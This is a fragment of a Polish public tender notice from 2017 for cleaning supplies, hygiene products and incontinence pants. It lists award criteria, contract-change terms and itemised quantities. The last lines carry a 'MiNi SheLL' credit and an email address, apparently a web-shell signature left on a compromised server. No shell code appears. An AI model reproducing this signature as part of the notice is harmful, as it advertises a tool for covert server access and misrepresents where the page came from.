                Przewidziane jest przeprowadzenie aukcji elektronicznej </b><i>(przetarg nieograniczony, przetarg ograniczony, negocjacje z ogłoszeniem) </i>
                nie
              <br /><b>Należy wskazać elementy, których wartości będą przedmiotem aukcji elektronicznej: </b><br /><b>Przewiduje się ograniczenia co do przedstawionych wartości, wynikające z opisu przedmiotu zamówienia:</b><br />
                nie
              <br />

              
                Należy podać, które informacje zostaną udostępnione wykonawcom w trakcie aukcji elektronicznej oraz jaki będzie  termin ich udostępnienia:
              
              Nie dotyczy. <br />
              Informacje dotyczące przebiegu aukcji elektronicznej: 
              Nie dotyczy.<br />
              Jaki jest przewidziany sposób postępowania w toku aukcji elektronicznej i jakie będą warunki, na jakich wykonawcy będą mogli licytować (minimalne wysokości postąpień): 
              Nie dotyczy.<br />
              Informacje dotyczące wykorzystywanego sprzętu elektronicznego, rozwiązań i specyfikacji technicznych w zakresie połączeń:
              Nie dotyczy. <br />
              Wymagania dotyczące rejestracji i identyfikacji wykonawców w aukcji elektronicznej: 
              <br />


              Informacje o liczbie etapów aukcji elektronicznej i czasie ich trwania: 
              <div style="padding-left: 20px">
                  Aukcja wieloetapowa
                  <table><tr><td>etap nr</td><td>czas trwania etapu</td></tr><tr><td></td><td></td></tr></table><br />
                Czy wykonawcy, którzy nie złożyli nowych postąpień, zostaną zakwalifikowani do następnego etapu:
                
                  nie
                <br />
                Warunki zamknięcia aukcji elektronicznej:
                <br />Nie dotyczy. </div><br /><b>IV.2) KRYTERIA OCENY OFERT </b><br /><b>IV.2.1) Kryteria oceny ofert: </b><br /><b>IV.2.2) Kryteria</b><br /><div style="padding-left: 20px"><table><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>Cena </td><td>60.00</td></tr><tr><td>Termin płatności</td><td>40.00</td></tr></table></div><br /><b>IV.2.3) Zastosowanie procedury, o której mowa w art. 24aa ust. 1 ustawy Pzp </b>(przetarg nieograniczony)
              <br />
                tak
              <br /><b>IV.3) Negocjacje z ogłoszeniem, dialog konkurencyjny, partnerstwo innowacyjne </b><br /><b>IV.3.1) Informacje na temat negocjacji z ogłoszeniem</b><br />
              Minimalne wymagania, które muszą spełniać wszystkie oferty:
              <br />Nie dotyczy. <br />
              Przewidziane jest zastrzeżenie prawa do udzielenia zamówienia na podstawie ofert wstępnych bez przeprowadzenia negocjacji
              
                nie
              <br />
              Przewidziany jest podział negocjacji na etapy w celu ograniczenia liczby ofert:
              
                nie
              <br />
              Należy podać informacje na temat etapów negocjacji (w tym liczbę etapów):
              <br />Nie dotyczy.<br />
              Informacje dodatkowe
              <br /><br /><br /><b>IV.3.2) Informacje na temat dialogu konkurencyjnego</b><br />
              Opis potrzeb i wymagań zamawiającego lub informacja o sposobie uzyskania tego opisu:
              <br />Nie dotyczy. <br />
              Informacja o wysokości nagród dla wykonawców, którzy podczas dialogu konkurencyjnego przedstawili rozwiązania stanowiące podstawę do składania ofert, jeżeli zamawiający przewiduje nagrody:
              <br />Nie dotyczy.<br />
              Wstępny harmonogram postępowania:
              <br />Nie dotyczy.<br />
              Podział dialogu na etapy w celu ograniczenia liczby rozwiązań:
              
                nie
              <br />
              Należy podać informacje na temat etapów dialogu:
              <br />Nie dotyczy. <br /><br />
              Informacje dodatkowe:
              <br /><br /><b>IV.3.3) Informacje na temat partnerstwa innowacyjnego</b><br />
              Elementy opisu przedmiotu zamówienia definiujące minimalne wymagania, którym muszą odpowiadać wszystkie oferty:
              <br />Nie dotyczy.<br />
              Podział negocjacji na etapy w celu ograniczeniu liczby ofert podlegających negocjacjom poprzez zastosowanie kryteriów oceny ofert wskazanych w specyfikacji istotnych warunków zamówienia:
              <br />
                nie
              <br />
              Informacje dodatkowe:
              <br /><br /><b>IV.4) Licytacja elektroniczna  </b><br />
              Adres strony internetowej, na której będzie prowadzona licytacja elektroniczna:
              <br /><div style="padding-left: 20px"></div>

              Adres strony internetowej, na której jest dostępny opis przedmiotu zamówienia w licytacji elektronicznej:
              <br /><div style="padding-left: 20px"></div>

              Wymagania dotyczące rejestracji i identyfikacji wykonawców w licytacji elektronicznej, w tym wymagania techniczne urządzeń informatycznych:
              <br /><div style="padding-left: 20px"></div>

              Sposób postępowania w toku licytacji elektronicznej, w tym określenie minimalnych wysokości postąpień:
              <br /><div style="padding-left: 20px">Nie dotyczy. </div>

              Informacje o liczbie etapów licytacji elektronicznej i czasie ich trwania: 
              <div style="padding-left: 20px">
                  Licytacja wieloetapowa
                  <table><tr><td>etap nr</td><td>czas trwania etapu</td></tr><tr><td></td><td></td></tr></table><br />
                Wykonawcy, którzy nie złożyli nowych postąpień, zostaną  zakwalifikowani do następnego etapu:
                
                  nie
                </div>

              Termin otwarcia licytacji elektronicznej:
              <br /><div style="padding-left: 20px"></div>

              Termin i warunki zamknięcia licytacji elektronicznej:
              <br /><div style="padding-left: 20px"></div><br />
              Istotne dla stron postanowienia, które zostaną wprowadzone do treści zawieranej umowy w sprawie zamówienia publicznego, albo ogólne warunki umowy, albo wzór umowy:
              <br /><div style="padding-left: 20px"></div><br />
              Wymagania dotyczące zabezpieczenia należytego wykonania umowy: 
              <br /><div style="padding-left: 20px"></div><br />
              Informacje dodatkowe:
              <br /><div style="padding-left: 20px"></div><b>IV.5) ZMIANA UMOWY</b><br /><b>Przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy:</b>
                tak

                <br />
                Należy wskazać zakres, charakter zmian oraz warunki wprowadzenia zmian:
                <br />1.	Zgodnie z art. 139 ust. 2 ustawy Prawo zamówień publicznych, umowa zostanie zawarta w formie pisemnej.
2.	Umowa zostanie zawarta z uwzględnieniem wymagań i warunków zamawiającego zawartych w Specyfikacji Istotnych Warunków Zamówienia i ofercie.
3.	Oferta Wykonawcy oraz SIWZ stanowi integralną część umowy.
4.	Umowa nie może być sprzeczna z ustawą Prawo zamówień publicznych, istotnymi postanowieniami umowy zawartymi w SIWZ.
5.	Zamawiający podpisze umowę z wykonawcą, który przedłoży najkorzystniejszą ofertę                     z punktu widzenia kryteriów przyjętych w niniejszej specyfikacji.
6.	Postanowienia umowy zawarto w projekcie umowy, który stanowi załącznik nr 5 do SIWZ.
7.	Zamawiający może naliczyć kary umowne na warunkach i w wysokościach określonych we wzorze umowy.
8.	Zamawiający dopuszcza zmianę postanowień umowy:
a)	gdy zmiany są korzystne dla Zamawiającego.
b)	polegająca na zmianie danych Wykonawcy bez zmian samego Wykonawcy (np. zmiana siedziby, adresu, nazwy),      
c)	waloryzacja wynagrodzenia 
Zamawiający informuje, że przewiduje warunki zmiany wynagrodzenia zgodnie                                     z postanowieniami art. 142 ust. 5 ustawy z dnia 29 stycznia 2004 r. Prawo zamówień publicznych, tj. zmiany: 
a.	stawki podatku od towarów i usług,
b.	wysokości minimalnego wynagrodzenia za pracę
c.	zasad podlegania ubezpieczeniom społecznym lub ubezpieczeniu zdrowotnemu lub wysokości stawki składki na ubezpieczenia społeczne lub zdrowotne.

9.	Zmiany umowy wymagają zgody obu stron z zachowaniem formy pisemnej pod rygorem nieważności. 
<br /><b>IV.6) INFORMACJE ADMINISTRACYJNE </b><br /><br /><b>IV.6.1) Sposób udostępniania informacji o charakterze poufnym </b><i>(jeżeli dotyczy): </i><br />Nie dotyczy. <br /><b>Środki służące ochronie informacji o charakterze poufnym</b><br />Nie dotyczy. <br /><b>IV.6.2) Termin składania ofert lub wniosków o dopuszczenie do udziału w postępowaniu: </b><br />
              Data: 08/05/2017, godzina: 10:00,
              <br />
              Skrócenie terminu składania wniosków, ze względu na pilną potrzebę udzielenia zamówienia (przetarg nieograniczony, przetarg ograniczony, negocjacje z ogłoszeniem):
              <br />
                nie
              <br />
              Wskazać powody:
              <br /><br />
              Język lub języki, w jakich mogą być sporządzane oferty lub wnioski o dopuszczenie do udziału w postępowaniu
              <br />&gt;
              Język polski. <br /><b>IV.6.3) Termin związania ofertą: </b>
                okres w dniach: 30 (od ostatecznego terminu składania ofert)
              <br /><b>IV.6.4) Przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia:</b>
                nie
              <br /><b>IV.6.5) Przewiduje się unieważnienie postępowania o udzielenie zamówienia, jeżeli środki służące sfinansowaniu zamówień na badania naukowe lub prace rozwojowe, które zamawiający zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia, nie zostały mu przyznane</b>
                nie
              <br /><b>IV.6.6) Informacje dodatkowe:</b><br /></div></div><div class="headerLarge_xforms" style="text-align: center"><u>
                ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH
              </u></div><div><b>Część nr: </b>1
                  
                <b>Nazwa: </b>Środki czystości i higieny, preparaty piorące<br /><div style="padding-left: 20px"><b>
                    1) Krótki opis przedmiotu zamówienia </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>GRUPA 1 Lp.	Nazwa artykułu	Nazwa oferowanego towaru	Ilość/ szt./
op./ pak./ rolk./pary 	Cena jednostkowa opakowania 
netto	Cena brutto             z kolumny 5	Wartość netto
(4 x 5)	Wartość VAT	Wartość brutto
(7+8)
1	2	3	4	5	6	7	8	9
1.		Komplet MOP (wiadro z tworzywa sztucznego            z mocnym uchwytem, jednokomorowe 10 l                          z koszykiem (wyciskaczem), końcówka MOP bawełniana, wkręcana, kij drewniany dł 150 cm            z gwintem.		90 szt.					
2.		Kij do szczotki/mopa drewniany z gwintem,              dł. 150 cm.		120 szt.					
3.		Końcówka MOP bawełniana, wkręcana.		150 szt.					
4.		Wiadro z tworzywa sztucznego z mocnym uchwytem, jednokomorowe 10 l z koszykiem (wyciskaczem).		120 szt.					
5.		Krem do rąk o właściwościach nawilżających               i odżywczych. Zawierający w składzie glicerynę            i inne składniki odżywczo  nawilżające.                      Op. 100 ml.		150 szt.					
6.		Mydło w kostce o właściwościach nawilżających          i neutralnym pH dla skóry, przebadane dermatologiczne  100 g.		720 szt.					
7.		Mydło szare kostka  op. 200 ml.		450 szt.					
8.		Mydło w płynie, o konsystencji kremu, łagodne dla skóry rąk, o właściwościach nawilżających, przebadane dermatologicznie, opakowanie 5 l.		380 szt.					
9.		Maszynka do golenia, do jednorazowego użytku, dwuostrzowa.		450 szt.					
10.		Papier toaletowy celulozowy biały, dwuwarstwowy, dł. 30  32 mb, szer. 9,5  10 cm. 1 op.  8 rolek		1500 op.					
11.		Pasta BHP 1 op.  500 g.		300 szt.					
12.		Mleczko do czyszczenia wszystkich powierzchni emaliowanych, ceramicznych i ze stali nierdzewnej. Zawierające system wybielający. Usuwający oporny brud nie rysując czyszczonej powierzchni. O gęstości nie mniejszej niż                     1,5 g/cm3 (w temp. 20°). Op. 750 ml.		360 szt.					
13.		Preparat uniwersalny do mycia i pielęgnacji gładkich powierzchni (kafle, podłogi)
		Wymagania:
- niepozostawiający smug,
- skuteczne czyszczący,
- o przyjemnym nie drażniącym zapachu,
- mycie ręczne od 50 do 100 ml na 10 l wody,
- wartość pH od 7,5  8,
- należy dołączyć kartę charakterystyki preparatu,
- op. 1 l.		360 szt.					
14.		Preparat do nabłyszczania powierzchni z linoleum, PCV, lastriko itp. odporny na ścieranie, zawierający substancje zapachowe. op. 0,5 l.		360 szt.					
15.		Płyn do ręcznego mycia naczyń o pH neutralnym dla skóry rąk. Skutecznie usuwający tłuszcz. Gęstość względna nie mniejsza niż 1,045 kg/cm3. Stosowanie: 5 ml na 5l wody. Op. 1L.		1200 op.					
16.		Płyn do mycia szyb op. 0,75 l ze spryskiwaczem. Dobrze usuwający silne zabrudzenia, nie pozostawiający zacieków i smug. Z formułą antystatyczną.  pH 8  8,5. Skład chemiczny: woda deminarlizowana, alkohol, ocet rozpuszczalniki rozpuszczalne w wodzie.                   Płyn o przyjemnym nie drażniącym zapachu,
należy dołączyć kartę charakterystyki.		1200 op.					
17.		Żel czyszcząco  dezynfekujący do sanitariatów            o działaniu bakteriobójczym, grzybobójczym                   i wirusobójczym, skutecznie usuwającym brud.           O gęstości względnej nie mniejszej niż 1,1 kg/l.  W składzie: podchloryn sodu (nie mniej niż 4,8/100g), &lt; 5% związków wybielających na bazie chloru, niejonowe środki powierzchniowo czynne. Op. 750 ml.		360 szt.					
18.		Żel do udrażniania instalacji sanitarnych. Docierający przez stojącą wodę do zatorów                   i samoczynnie je usuwa i likwiduje nieprzyjemny zapach. Rozpuszcza wszelkie osady tłuszczowe, odpadki kuchenne oraz inne substancje organiczne. Zawiera substancje o działaniu antybakteryjnym i grzybobójczym. Op. 500 ml.		300 szt.					
19.		Granulat do udrażniania instalacji sanitarnych. Docierający przez stojącą wodę do zatorów                   i samoczynnie je usuwa i likwiduje nieprzyjemny zapach. Rozpuszcza wszelkie osady tłuszczowe, odpadki kuchenne oraz inne substancje organiczne. Zawiera substancje o działaniu antybakteryjnym i grzybobójczym. Op. 500 ml.		300 szt.					
20.		Ręcznik papierowy typu  ZZ, jednowarstwowe, gofrowany, wodoutwardzalny, rozmiar 23 x 25 cm, kolor: biały, gramatura 38 - 40 g/m2,                            op. 200 listków.		15 000 pakietów					
21.		Ręcznik papierowy w rolce, dwuwarstwowy, chłonny i wytrzymały na rozdzieranie, podzielony na listki, 100% celulozy, gofrowany, kolor: biały,                              długość ok. 100 m, gramatura 18  20 g/m2.		600 rolek					
22.		Rękawice gospodarcze przeznaczone do prac domowych, sanitarnych. Wykonane z lateksu           i kauczuku naturalnego. Gramatura 55 - 60 g, wewnętrzna powierzchnia rękawic pokryta flokiem (pyłem bawełnianym), na części chwytnej chropowata struktura, odporne na rozciąganie, wysoka odporność na detergenty i środki piorące. op. 1 para.		720 par					
23.		Rękawice winylowe, surowiec: polichlorek winylu, środek pudrujący: skrobia (mączka) kukurydziana, powierzchnia: gładka, wykończenie mankietu: równomiernie rolowany brzeg, brak zawartość protein lateksu, jednorazowego użytku.		720 par					
24.		Szczotka do podłogi, nakręcona na kij, na drewnianych oprawach z otworem gwintowany, nabijane surowcem PET/PPN/szczecina/ mieszanka z włosia naturalnego z dodatkiem PET lub PPN, rozmiar - 40 cm.		30 szt.					
25.		Miotły typu "Ulicówka" produkowane                           na oprawach z drewna bez uchwytu, nabijane surowcem PET/PPN/PCV z długim i włosem. Długość 30 cm.		80 szt.					
26.		Szczotka do WC (toaletowa) wykonana                       z tworzywa sztucznego ze specjalną końcówką do czyszczenia wewnętrznej części krawędzi muszli; z pojemnikiem wykonanym z tworzywa sztucznego.		150 szt.					
27.		Zmiotka z szufelką, wykonane z tworzywa sztucznego, szufelka zakończona gumą.             Wymiar 295 x 195 x 305.		90 szt.					
28.		Ścierka z mikrofibry, uniwersalna. Doskonale zbierająca kurz i brud. Mająca specjalną budowę mikrowłókien. Nie pozostawiająca smug i śladów po wytarciu. Nadaje się do czyszczenia na sucho             i na mokro. Wymiar 30 x 40.		1800 szt.					
29.		Ścierka do podłogi 100 % bawełna. Wzmocniona, o grubym splocie i dużej gęstości.  Pozostawiająca niewiele włókien, zwiększona trwałość, nasiąkliwość min. 70%.
Wymiar 70 x 70 cm.		1800 szt.					
30.		Ścierka do podłogi wiskozowa. Nie pozostawia włókien , dobrze zbiera wodę.                     Wymiar 50 x 70 cm.		1800 szt.					
31.		Tabletki do mycia mechanicznego naczyń              z właściwościami nabłyszczającymi 1 op. 100 tabletek. Usuwa najtrudniejsze plamy, zaschnięte jedzenie, zaplamienia, tłuszcz, zabrudzenia po herbacie, odpornych zabrudzeń. Ochrona przed osadzaniem się kamienia w zmywarce.		80 op.					
32.		Preparat do zmywarek  sól ziarnista. Całkowicie wolna od zanieczyszczeń. Usuwająca kamień                i zapobiegający osadzaniu się kamienia, zmiękczająca wodę. Op. 1,5 kg.		60 op.					
33.		Worki na odpady 35 l z taśmą ściągającą, wzmocnione, grubość foli min. 0,04 mikrony, wykonane z foli LDPE. Op. 25 szt.		1800 op.					
34.		Worki na odpady 60 l z taśmą ściągającą, wzmocnione, grubość foli min. 0,04 mikrony, wykonane z foli LDPE.  Op. 25 szt.		1800 op.					
35.		Worki na odpady 120 l z taśmą ściągającą, wzmocnione, grubość foli min. 0,04 mikrony, wykonane z foli LDPE. Op. 25 szt.		1800 op.					
36.		TTS Wkład do mopa bawełniany do stelaża płaski zapinany speedy 40 cm		50 szt.					
37.		Środek piorąco- dezynfekujący bez zawartości fosforanów. 
Wymagania:
-pierze, wybiela, dezynfekuje,
-umieszczony w wykazie PZH do 
chemiczno- termicznej 
dezynfekcji prania przy 65oC,
-atest PZH (dołączyć),
-wpis do rejestru środków biobójczych
-op. 15 kg.
		1600 kg					

<br /><b>2) Wspólny Słownik Zamówień (CPV): </b>39830000-9, 39831250-3,
                    39831240-0,
                    39720000-5,
                    39831000-6<br /><b>3) Wartość części zamówienia (jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br />
                  Wartość bez VAT:
                  <br />
                  Waluta:
                  <br /><div style="padding-left: 20px"><br /><b>4) Czas trwania lub termin wykonania: </b>
                      okres w miesiącach: 36<br /><b>5) Kryteria oceny ofert: </b><table style="padding-left: 20px"><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>CENA</td><td>60.00</td></tr><tr><td>Termin płatności</td><td>40.00</td></tr></table><b>
                      6) INFORMACJE DODATKOWE:
                    </b><br /></div></div><br /></div><div><b>Część nr: </b>2
                  
                <b>Nazwa: </b>Arykuły higieniczne<br /><div style="padding-left: 20px"><b>
                    1) Krótki opis przedmiotu zamówienia </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>GRUPA 2 Lp.	Nazwa artykułu	Nazwa oferowanego towaru	Ilość/ szt./
op./ pak./ rolk./pary 	Cena jednostkowa opakowania 
netto	Cena brutto             z kolumny 5	Wartość netto
(4 x 5)	Wartość VAT	Wartość brutto
(7+8)
1	2	3	4	5	6	7	8	9
1.		Pieluchomajtki Medium 2 (75 x 110)		22 500					
2.		Pieluchomajtki LARGE 3 (100 x 150)		8 000					
<br /><b>2) Wspólny Słownik Zamówień (CPV): </b>33770000-8<br /><b>3) Wartość części zamówienia (jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br />
                  Wartość bez VAT:
                  <br />
                  Waluta:
                  <br /><div style="padding-left: 20px"><br /><b>4) Czas trwania lub termin wykonania: </b>
                      okres w miesiącach: 36<br /><b>5) Kryteria oceny ofert: </b><table style="padding-left: 20px"><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>Cena</td><td>60.00</td></tr><tr><td>Termin płatności</td><td>40.00</td></tr></table><b>
                      6) INFORMACJE DODATKOWE:
                    </b><br /></div></div><br /></div></div>

Creat By MiNi SheLL
Email: jattceo@gmail.com